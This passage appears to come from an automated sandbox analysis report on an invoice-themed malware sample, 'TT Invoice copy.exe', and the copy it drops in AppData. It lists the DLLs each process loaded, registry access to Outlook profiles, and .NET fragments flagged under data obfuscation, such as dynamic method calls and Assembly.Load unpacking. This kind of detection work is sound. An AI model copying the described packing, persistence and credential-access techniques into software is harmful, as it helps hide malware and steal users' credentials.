                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: TT Invoice copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: TT Invoice copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: TT Invoice copy.exe, b4g.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{EZ6(typeof(IntPtr).TypeHandle),EZ6(typeof(Type).TypeHandle)})
                        Source: pUAQmWA.exe.0.dr, b4g.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{EZ6(typeof(IntPtr).TypeHandle),EZ6(typeof(Type).TypeHandle)})
                        .NET source code contains potential unpacker
                        Source: 0.2.TT Invoice copy.exe.27fa198.3.raw.unpack, SQL.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.cs.Net Code: Xb7Zq2nSjr System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.cs.Net Code: Xb7Zq2nSjr System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 0_2_05266A80 push eax; ret 0_2_05266A81
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_01010CA1 push edi; retf 8_2_01010CAA
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_0101CF68 push 040564F4h; iretd 8_2_0101CF75
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 9_2_06876A80 push eax; ret 9_2_06876A81
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeCode function: 13_2_016CCF70 push 0406CAF4h; iretd 13_2_016CCF75
                        Source: TT Invoice copy.exeStatic PE information: section name: .text entropy: 7.886672511134331
                        Source: pUAQmWA.exe.0.drStatic PE information: section name: .text entropy: 7.886672511134331
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, sXgi0htaQsuNYIfNrN.csHigh entropy of concatenated method names: 'e8VcLESMTR', 'bplc7UQDkH', 'siPcJWJ2kY', 'aH2cygJGh8', 'knfc3D8fke', 'KMDcUZTmBW', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, RF748TzdcmDKT0pktw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPwutp3gBR', 'CACuE4bx9Y', 'vosuwcaWks', 'Xg4u1UHYtd', 'xm5uc5vsrs', 'vSfuuN9BM7', 'eEuuCU8m5C'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, JKqZBeirWwMbFNqmDL.csHigh entropy of concatenated method names: 'SWqvbCjYWW', 'sj3vMt5Te0', 'Q3QvQvCNCN', 'FJrvlc09i3', 'U9AvDY10lv', 'iFEQPonF8S', 'Q34QkPrmCa', 'HVbQWKcx8U', 'hlbQ89vhvp', 'lWjQSkRCoa'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, IGQN0nJpmP2x7MnecC.csHigh entropy of concatenated method names: 'UHytm12oUH', 'lditYNhn58', 'FUMtLBKhXg', 'FVet7GNBKO', 'wQ3tykcfWX', 'KRwtUmNqnA', 'xWjtaUby3e', 'L3Xtnaa0ic', 'NTutotpp4t', 'gEht5LhIyO'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, T6oa9E5pSUGTToS4lh.csHigh entropy of concatenated method names: 'GEETruTbk4', 'SJgTXI8XXZ', 'HHSTm0QY9d', 'MFBTYHe2Zw', 'j6rTEuH8Ag', 'roLTw0fuNC', 'D3sT1tqGEC', 'qVZTc81uP4', 'qmATusJkV0', 'bMtTCMiNMs'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, W27nI3oWEWom4ACrBM.csHigh entropy of concatenated method names: 'Odp18m1xc3', 'ViZ1hucEXj', 'pH9cOBTpkf', 'dVRcHekvaB', 'S1k15holsM', 'bAE1gBs6Qh', 'GQC1AIub7E', 'H6V13DRVYv', 'HBS1Ba3t1S', 'Wwo1imgbqO'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.csHigh entropy of concatenated method names: 'pRLxbuCn6F', 'UGexslVkpn', 'gTtxMZslpS', 'cu5xTTNyWf', 'bZPxQbwgke', 'YN5xv8YBVC', 'XuPxlRXNmb', 'aKWxDKOvAJ', 'yoYxdwUUjy', 'XYlxekKR1q'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, lJcE0HN5f8kFk2IH54.csHigh entropy of concatenated method names: 'Dispose', 'TW9HSXAt0E', 'L0N27JFKWl', 'knlffqgW1p', 'HxYHh31VCA', 'b8UHz9fQOM', 'ProcessDialogKey', 'pbq2OVIB7w', 'ag52HQgLgj', 'm9522UefFy'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, qLRTZ12GJnmImXqtRt.csHigh entropy of concatenated method names: 'gGNqqDmb5', 'Cu4rRM8Yk', 'aQNXZCrpD', 'zShpeKohQ', 'vNgYoLuqT', 'rq1GLXrfM', 'NkNiFAo1j03I4l2Hqt', 'OUxwLDv0xEo9vI7S35', 'SK6cwJ0Mx', 'QJBCihhpO'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, zy1XZnLW7YQBNumutP.csHigh entropy of concatenated method names: 'wxBQVktK8I', 'C2bQpCqX80', 'fIxTJ0OXD3', 'sZETyaGlLf', 'k0mTUBOgof', 'TWhTRi4aCh', 'PVpTan5CcX', 'xcMTnl43b7', 'cFNTInxkqM', 'd76TodruR1'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, thBvlWSkjabsB2oLif.csHigh entropy of concatenated method names: 'beUls46f10', 'xKOlTRJ4iv', 'ftTlvmDDie', 'WBfvha3ryP', 'eDOvzHaE1w', 'PYUlO9LtIC', 'SMIlHysCNl', 'yiBl2EZCpI', 'pPulxOFZih', 'VWglZw5oRB'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, XFsF25IxPNfEBmhSd8o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g7MC30g4VA', 'NFMCBCWjmc', 'oNnCiEbGZY', 'kTtC9a6ne7', 'qF0CP9xwAw', 'yfgCkEVOYj', 'gdnCW89DHu'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, xfd7J5uMrysOyK7NTk.csHigh entropy of concatenated method names: 'Gg5csn5vOU', 'NdvcMOGdGD', 'wIPcTZ9vAw', 'Sa9cQgZ6BF', 'exMcvL9XPL', 'F59clikeCE', 'Y4dcDvyhlN', 'tWNcdjyIix', 'lSkce39KRw', 'a5Sc6Lr819'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, rRuIvBqw2lDAV0Lgfa.csHigh entropy of concatenated method names: 'G9UHlpnj35', 'HHEHDGpdJV', 'V2OHeHynYk', 'XnjH6l3OqT', 'WplHE3HTY4', 'Ld8HwbDhxY', 'PvAPtSeJvsMMgFlVtb', 'qy0n47VISNXu0UHG6E', 'je7HHelc7G', 'aBDHxDaWlk'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, eZUFRljWcJZhOkQ3W5.csHigh entropy of concatenated method names: 'uy5aAUrfbD6AS4VmPn4', 'ykP6lgrX7bo9HR9gqTS', 'fo4vceFy0s', 'cDKvuHZAma', 't9UvCUZLID', 'rOid46rBORdQJUjnS7h', 'Y3BdSrrEZ2NbW7WvYAC', 'iuyNJFruwbl5e27AE1M'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, FSSV4QIOZXRnmau7TRE.csHigh entropy of concatenated method names: 'MZSu4sANgj', 'VHduKuKe29', 'mG1uqpuT4M', 'dTBur5CDr0', 'oEQuVq4ljP', 'qm8uXugPXJ', 'nIXup4gCnW', 'rHZumd70KX', 'CO8uYTAOpw', 'TmuuGJ2kJw'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, rGsUy5rWUNpkLEljaY.csHigh entropy of concatenated method names: 'zTduHwiesW', 'TxpuxmFfAK', 'MnVuZsrqYq', 'vSGusLD2CR', 'paxuMrL2xu', 'K0JuQdoqbI', 'gccuvsfIMF', 'vjDcWkw4Wg', 'UKFc8DFkdj', 'pSmcSms6j4'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, Fe6Q71Wm6WhO9Yp10w.csHigh entropy of concatenated method names: 'zenM3C7DZm', 'JHCMBWjbKO', 'SI3Mij3Mlg', 'yr8M9OwsqB', 'nVlMPaDK9J', 'QffMkNPX2G', 'u9AMWA71PB', 'Qn3M8cR107', 'GCdMSEVZix', 'Dk4MhRjTCD'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, m0qy82dasqNwHe64S4.csHigh entropy of concatenated method names: 'DD7l4ASIr1', 'DoylKnkDZI', 'NQhlqqO6iQ', 'ye5lrAm3Ja', 'WrdlVKKKTs', 'YJvlX0fJy6', 'o85lpq2QI8', 'RnZlmll86F', 'eUhlYcnCDY', 'ivtlG4CMZ1'
                        Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, QlYnWW9i1E3P9XLykS.csHigh entropy of concatenated method names: 'ToString', 'eNLw591lQM', 'CPgw7OOxO6', 'J8NwJWC9Kq', 'Rpqwy3Jkjj', 'EKxwUgDp3w', 'NO4wRu7yST', 'ImfwaiyARs', 'iuQwn31Dv1', 'I4RwIGbQnt'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, sXgi0htaQsuNYIfNrN.csHigh entropy of concatenated method names: 'e8VcLESMTR', 'bplc7UQDkH', 'siPcJWJ2kY', 'aH2cygJGh8', 'knfc3D8fke', 'KMDcUZTmBW', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, RF748TzdcmDKT0pktw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPwutp3gBR', 'CACuE4bx9Y', 'vosuwcaWks', 'Xg4u1UHYtd', 'xm5uc5vsrs', 'vSfuuN9BM7', 'eEuuCU8m5C'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, JKqZBeirWwMbFNqmDL.csHigh entropy of concatenated method names: 'SWqvbCjYWW', 'sj3vMt5Te0', 'Q3QvQvCNCN', 'FJrvlc09i3', 'U9AvDY10lv', 'iFEQPonF8S', 'Q34QkPrmCa', 'HVbQWKcx8U', 'hlbQ89vhvp', 'lWjQSkRCoa'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, IGQN0nJpmP2x7MnecC.csHigh entropy of concatenated method names: 'UHytm12oUH', 'lditYNhn58', 'FUMtLBKhXg', 'FVet7GNBKO', 'wQ3tykcfWX', 'KRwtUmNqnA', 'xWjtaUby3e', 'L3Xtnaa0ic', 'NTutotpp4t', 'gEht5LhIyO'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, T6oa9E5pSUGTToS4lh.csHigh entropy of concatenated method names: 'GEETruTbk4', 'SJgTXI8XXZ', 'HHSTm0QY9d', 'MFBTYHe2Zw', 'j6rTEuH8Ag', 'roLTw0fuNC', 'D3sT1tqGEC', 'qVZTc81uP4', 'qmATusJkV0', 'bMtTCMiNMs'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, W27nI3oWEWom4ACrBM.csHigh entropy of concatenated method names: 'Odp18m1xc3', 'ViZ1hucEXj', 'pH9cOBTpkf', 'dVRcHekvaB', 'S1k15holsM', 'bAE1gBs6Qh', 'GQC1AIub7E', 'H6V13DRVYv', 'HBS1Ba3t1S', 'Wwo1imgbqO'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.csHigh entropy of concatenated method names: 'pRLxbuCn6F', 'UGexslVkpn', 'gTtxMZslpS', 'cu5xTTNyWf', 'bZPxQbwgke', 'YN5xv8YBVC', 'XuPxlRXNmb', 'aKWxDKOvAJ', 'yoYxdwUUjy', 'XYlxekKR1q'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, lJcE0HN5f8kFk2IH54.csHigh entropy of concatenated method names: 'Dispose', 'TW9HSXAt0E', 'L0N27JFKWl', 'knlffqgW1p', 'HxYHh31VCA', 'b8UHz9fQOM', 'ProcessDialogKey', 'pbq2OVIB7w', 'ag52HQgLgj', 'm9522UefFy'
